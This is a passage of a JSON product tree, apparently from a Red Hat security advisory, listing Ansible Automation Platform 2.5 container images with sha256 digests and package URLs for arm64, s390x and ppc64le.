"purl": "pkg:oci/platform-resource-rhel8-operator@sha256%3A7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel8@sha256%3Ace70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774449833"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel8@sha256%3A05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399119"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel8@sha256%3Af501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel8@sha256%3Ade9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel8@sha256%3A299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774573155"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel8@sha256%3Ac3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774414699"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8@sha256%3A0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446874"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8-operator@sha256%3A3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167211"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-base-rhel8@sha256%3A009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398095"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-toolkit-rhel8@sha256%3Ad91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401376"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8@sha256%3A7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8-operator@sha256%3Ac6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8@sha256%3Afe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8-operator@sha256%3A0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel8@sha256%3Aa28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8@sha256%3A116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774352226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8-operator@sha256%3A9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167258"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel8@sha256%3Ab829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399567"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8@sha256%3A1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774587114"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8-operator@sha256%3Adec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167254"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel8@sha256%3A0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774589220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel8@sha256%3Ac5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774405413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel8@sha256%3A21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774409723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel8@sha256%3A8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774404039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel8@sha256%3Ad6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446347"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel8-operator@sha256%3Ac20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel8@sha256%3Af700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774449833"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel8@sha256%3A43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399119"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel8@sha256%3Afe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel8@sha256%3Ab8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel8@sha256%3Af1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774573155"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel8@sha256%3A2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774414699"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8@sha256%3A2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446874"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8-operator@sha256%3Af1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167211"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"product_identification_helper": {
